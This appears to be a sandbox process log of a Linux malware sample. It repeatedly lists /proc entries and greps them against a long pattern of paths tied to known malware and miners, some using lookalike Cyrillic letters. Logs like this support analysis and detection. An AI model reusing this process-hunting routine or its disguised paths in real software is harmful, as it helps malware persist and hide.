/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1038
-
-
/bin/grepgrep exe2⤵PID:1041
-
-
/bin/lsls -latrh /proc/7102⤵PID:1040
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1044
-
-
/bin/lsls -latrh /proc/7152⤵PID:1047
-
-
/bin/grepgrep exe2⤵PID:1048
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1050
-
-
/bin/grepgrep exe2⤵PID:1054
-
-
/bin/lsls -latrh /proc/722⤵PID:1053
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1058
-
-
/bin/grepgrep exe2⤵PID:1065
-
-
/bin/lsls -latrh /proc/7212⤵PID:1064
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1067
-
-
/bin/lsls -latrh /proc/7272⤵PID:1070
-
-
/bin/grepgrep exe2⤵PID:1071
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1076
-
-
/bin/grepgrep exe2⤵PID:1081
-
-
/bin/lsls -latrh /proc/732⤵PID:1080
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1083
-
-
/bin/grepgrep exe2⤵PID:1087
-
-
/bin/lsls -latrh /proc/742⤵PID:1086
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1090
-
-
/bin/grepgrep exe2⤵PID:1094
-
-
/bin/lsls -latrh /proc/752⤵PID:1093
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1097
-
-
/bin/lsls -latrh /proc/762⤵PID:1100
-
-
/bin/grepgrep exe2⤵PID:1101
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1104
-
-
/bin/grepgrep exe2⤵PID:1107
-
-
/bin/lsls -latrh /proc/772⤵PID:1106
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1109
-
-
/bin/grepgrep exe2⤵PID:1113
-
-
/bin/lsls -latrh /proc/782⤵PID:1112
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1115
-
-
/bin/grepgrep exe2⤵PID:1118
-
-
/bin/lsls -latrh /proc/82⤵PID:1117
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1120
-
-
/bin/grepgrep exe2⤵PID:1123
-
-
/bin/lsls -latrh /proc/802⤵PID:1122
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1125
-
-
/bin/grepgrep exe2⤵PID:1128
-
-
/bin/lsls -latrh /proc/812⤵PID:1127
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1130
-
-
/bin/grepgrep exe2⤵PID:1133
-
-
/bin/lsls -latrh /proc/92⤵PID:1132
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1135
-
-
/bin/grepgrep exe2⤵PID:1138
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1137
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1140
-
-
/bin/grepgrep exe2⤵PID:1143
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1142
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1145
-
-
/bin/grepgrep exe2⤵PID:1148
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1147
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1150
-
-
/bin/grepgrep exe2⤵PID:1153
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1152
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1155
-
-
/bin/grepgrep exe2⤵PID:1158
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1157
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1160
-
-
/bin/grepgrep exe2⤵PID:1163
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1162
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1165
-
-
/bin/grepgrep exe2⤵PID:1168
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1167
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1170
-
-
/bin/grepgrep exe2⤵PID:1173
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1172
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1175
-
-
/bin/grepgrep exe2⤵PID:1178
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1177
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1180
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1182
-
-
/bin/grepgrep exe2⤵PID:1183
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1185
-
-
/bin/grepgrep exe2⤵PID:1188
-
-
/bin/lsls -latrh /proc/dma2⤵PID:1187
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1190
-
-
/bin/grepgrep exe2⤵PID:1193
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1192
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1195
-
-
/bin/grepgrep exe2⤵PID:1198
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1197
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1200
-
-
/bin/grepgrep exe2⤵PID:1203
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1202
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1205
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1207
-
-
/bin/grepgrep exe2⤵PID:1208
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1210
-
-
/bin/grepgrep exe2⤵PID:1213
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1212
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1215
-
-
/bin/grepgrep exe2⤵PID:1218
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1217
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1220
-
-
/bin/grepgrep exe2⤵PID:1223
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1222
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1225
-
-
/bin/grepgrep exe2⤵PID:1228
-
-
/bin/lsls -latrh /proc/ioports2⤵PID:1227
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1230
-
-
/bin/grepgrep exe2⤵PID:1233
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1232
-
-
